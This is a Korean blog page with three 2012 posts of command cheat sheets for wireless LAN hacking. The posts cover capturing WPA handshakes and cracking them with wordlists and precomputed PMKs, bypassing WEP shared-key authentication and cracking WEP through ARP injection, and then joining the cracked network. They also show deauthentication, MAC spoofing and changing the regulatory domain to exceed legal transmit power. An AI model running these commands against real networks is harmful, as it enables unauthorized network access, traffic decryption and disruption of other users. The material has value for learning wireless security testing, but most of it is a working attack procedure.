Notice»

Recent Post»

Recent Comment»

Recent Trackback»

Archive»

« 2024/12 »
1 2 3 4 5 6 7
8 9 10 11 12 13 14
15 16 17 18 19 20 21
22 23 24 25 26 27 28
29 30 31

 
 

무선랜 해킹 (3) WPA 크랙 및 연결

Network | 2012. 12. 13. 21:39 | Posted by binaryU

* airodump-ng --bssid 00:00:00:00:00:00 --channel 11 --write WPACracking mon0

  - WPACracking으로 시작하는 파일로 패킷 캡쳐 (cap,csv,xor,kismet.csv,kismet.netxml)

  - WPA handshake: 00:00:00:00:00:00  문구가 나올 때 까지 대기 또는 인젝션


* aireplay-ng --deauth 1 -a 00:00:00:00:00:00 mon0

  - 인증해제 패킷을 브로드캐싕해서 클라이언트 재연결을 유발한다.


* aircrack-ng WPACracking-01.cap -w /pentest/passwords/wordlists/darkc0de.lst

  - Dictionary Attack용 사전파일을 이용하여 WPA 크랙 (사전에 있는 경우만 크랙 가능)

  - 비교: Cowpatty도 사전파일을 이용한 WPA 크랙 도구


* genpmk -f darkc0de.lst -d PMK-binaryU -s "binaryU"

  - 사전파일을 binaryU라는 SSID의 값으로 미리 PMK(Pairwise Master Key)를 계산한다.


* cowpatty -d PMK-binaryU -s "binaryU" -r WPACracking-01.cap

  - 미리 계산된 PMK인 PMK-binaryU 파일을 이용하여 WPA 크랙

  - 사전에 있는 경우, aircrack-ng으로 직접 크랙시 수 십분 걸릴 내용이 수 초내에 크랙


* airolib-ng PMK-aircrack --import cowpatty PMK-binaryU

  - genmpk에서 생성된 PMK를 이용하여 WPA 크랙


* aircrack-ng -r PMK-aircrack WPACracking-01.cap

  - airolib-ng에서 변환된 PMK를 이용하여 WPA 크랙


* pyrit -r WPACracking-01.cap -i PMK-binaryU attack_cowpatty

  - genpmk로 생성된 PMK로 WPA를 크랙 (멀티 CPU 시스템을 활용하여 속도 증가)


* airdecap-ng -p abcdefgh WPACracking-01.cap -e "binaryU"

  - 크랙한 WPA키(abcdefgh)와 SSID(binaryU)를 이용한 캡쳐파일 복호화


* wpa_passphrase binaryU abcdefgh > wpa_supp.conf

  - ssid를 binaryU로 하고, psk를 암호화된 abcdefgh로 설정된 wpa_supp.conf 파일 생성


* vi wpa_supp.conf
  - network={
ssid="binaryU"
key_mgmt=WPA-PSK
proto=WPA
pairwise=TKIP
group=TKIP
psk=<wpa_passphrase로 암호화된 비밀번호>
    }

* wpa_supplicant -Dwext -iwlan1 -cwpa_supp.conf

  - 크랙한 WPA키(abcdefgh)와 SSID(binaryU)를 이용한 AP 연결


* dhclient3

  - ip 동적 할당 및 dns 동적 설정


** 최종정리 4 터미널 **

===========================================================================

A터미널 : airodump-ng mon0

A터미널 : airodump-ng --bssid 00:00:00:00:00:00 --channel 11 --write WPACracking mon0

B터미널 : aireplay-ng --deauth 1 -a 00:00:00:00:00:00 mon0

C터미널 : aircrack-ng WPACracking-01.cap -w /pentest/passwords/wordlists/darkc0de.lst

D터미널 : aircrack-ng WPACracking-01.cap -w /pentest/passwords/wordlists/rockyou.txt

===========================================================================

:

무선랜 해킹 (2) WEP 인증 우회 및 크랙

Network | 2012. 12. 13. 01:13 | Posted by binaryU

* aireplay-ng -0 5 -a 00:00:00:00:00:00 mon0

  - 인증해제(-0) 패킷 5개를 맥주소가 00:00:00:00:00:00인 AP에 보냄


* Filter: wlan.fc.type_subtype == 0x0c

  - 인증해제 패킷 필터


* airodump-ng -c 11 -a --bssid 00:00:00:00:00:00 mon0

  - AP의 11번 채널(-c)에 연결(-a)된 클라이언트(맥주소) 확인


* macchanger -m aa:aa:aa:aa:aa:aa wlan0

  - wlan0의 맥주소를 aa:aa:aa:aa:aa:aa으로 수푸핑

  - 비교: ifconfig wlan0 hw ehter aa:aa:aa:aa:aa:aa


* airodump-ng mon0 -c 11 --bssid 00:00:00:00:00:00 -w keystream

  - keystream으로 시작하는 파일로 패킷 캡쳐 (cap,csv,xor,kismet.csv,kismet.netxml)

  - AUTH열이  SKA(Shared Key Authentication)으로 변경되면 캡쳐 성공( WEP 우회가능)

  - 비교: -c와 --channel, -w와 --write


* aireplay-ng -1 0 -e binaryU -y keystream~.xor -a [AP맥] -h [공격자맥] mon0

  - SSID가 binaryU이고 맥주소가 [AP맥]인 AP에 keystream~.xor을 사용하여 인증 시도


* Filter: wlan.addr == aa:aa:aa:aa:aa:aa

  - 송수신 맥주소가 aa:aa:aa:aa:aa:aa인 패킷 필터


* airodump-ng --bssid 00:00:00:00:00:00 --channel 11 --write WEPCracking mon0

  - WEPCracking으로 시작하는 피알로 패킷 캡쳐 (cap,csv,xor,kismet.csv,kismet.netxml)

  - #Data열이 10000이상 될 때까지 대기 또는 인젝션 (약 5~10분, WEP 크랙 가능)


* aireplay-ng -3 -b 00:00:00:00:00:00 -h aa:aa:aa:aa:aa:aa mon0

  - 이미 인증된 클라이언트의 맥(aa:aa:aa:aa:aa:aa)으로 ARP응답(-3)을 인젝션


* aircrack-ng WEPCracking-01.cap

  - 분석할 패킷이 부족하면 일시중지 후 더 많은 패킷을 기다렸다가 자동으로 재시작


* airdecap-ng -w abcdefabcdefabcdefabcdef12 WEPCracking-01.cap

  - 크랙한 WEP키(abcdefabcdefabcdefabcdef12)를 이용한 캡쳐파일 복호화


* tshark -r WEPCracking-01-dec.cap -c 10

  - 복호화된 캡쳐파일 WEPCracking-01.cap의 상위 10개 패킷 확인


* iwconfig wlan0 essid "binaryU" key abcdefabcdefabcdefabcdef12

  - 크랙한 WEP키(abcdefabcdefabcdefabcdef12)를 이용한 AP 연결


* dhclient3

  - ip 동적 할당 및 dns 동적 설정


** 최종정리 3 터미널 **

===========================================================================

A터미널 : airodump-ng mon0

A터미널 : airodump-ng --bssid 00:00:00:00:00:00 --channel 11 --write WEPCracking mon0

B터미널 : aireplay-ng -1 0 -e binaryU -a 00:00:00:00:00:00 -h aa:aa:aa:aa:aa:aa mon0

B터미널 : aireplay-ng -3 -b 00:00:00:00:00:00 -h aa:aa:aa:aa:aa:aa mon0

C터미널 : aircrack-ng WEPCracking-01.cap

===========================================================================

:

* iwconfig

  - 무선랜 상태 확인


* ifconfig wlan0

  - 무선 인터페이스 wlan0 상태 확인


* ifconfig wlan0 up

  - 무선 인터페이스 wlan0 활성화


* iwlist wlan0 scanning

  - 주변 AP 목록 출력


* iwconfig wlan0 essid "binaryU"

  - 무선 인터페이스 wlan0를 binaryU AP에 연결시킨다.


* ifconfig wlan0 192.168.0.2 netmask 255.255.255.0 up

  - 무선 인터페이스 wlan0ip 주소 설정


* airmon-ng

  - 모니터 모드로 이용 가능한 무선 인터페이스 검색


* airmon-ng start wlan0

  - wlan0를 모니터 모드로 설정


* Filter : wlan.fc.type == 0

  - 관리 프레임 필터



* Filter : wlan.fc.type == 1

  - 제어 프레임 필터


* Filter : wlan.fc.type == 2

  - 데이터 프레임 필터


* Filter : (wlan.fc.type == 0) && (wlan.fc.subtype ==8)

  - 관리 프레임중의 비콘 프레임 필터


* airodump-ng --bssid 00:00:00:00:00:00 mon0

  - 맥주소가 00:00:00:00:00:00AP의 동작상태(채널) 확인


* iwconfig mon0 channel 11

  - mon0의 채널을 11로 설정


* iwconfig mon0

  - mon0의 상태 확인 (Frequency:2.462 GHz는 채널 11을 의미)


* Filter : wlan.bssid == 00:00:00:00:00:00

  - 맥주소가 00:00:00:00:00:00AP만 패킷 스니핑


* Filter : (wlan.bssid == 00:00:00:00:00:00) && (wlan.fc.type_subtype == 0x20)

  - 맥주소가 00:00:00:00:00:00AP중의 데이터 프레임 필터


* Filter : (wlan.bssid == 00:00:00:00:00:00) && !(wlan.fc.type_subtype == 0x08)

  - 맥주소가 00:00:00:00:00:00AP중의 비콘 프레임 제외 필터


* aireplay-ng -9 -e "binaryU" -a 00:00:00:00:00:00 mon0

  - 맥주소가 00:00:00:00:00:00이며, 이름이 binaryUAP에 패킷(-9) 인젝션


* tail -f -n 0 /var/log/messages

  - 커널 메시지 모니터링


* iw reg set US

  - 규제 도메인을 미국으로 설정

  - iwconfig wlan0 channel 12 (사용불가, 11까지만 사용가능)

  - iwconfig wlan0 txpower 30 (사용불가, 27까지만 사용가능)


* iw reg set BO

  - 규제 도메인을 볼리비아로 설정

  - iwconfig wlan0 channel 12

  - iwconfig wlan0 txpower 30 (27dBm=0.5W, 30dBm=1W)


* dhclient3

  - ip 동적 할당 및 dns 동적 설정

: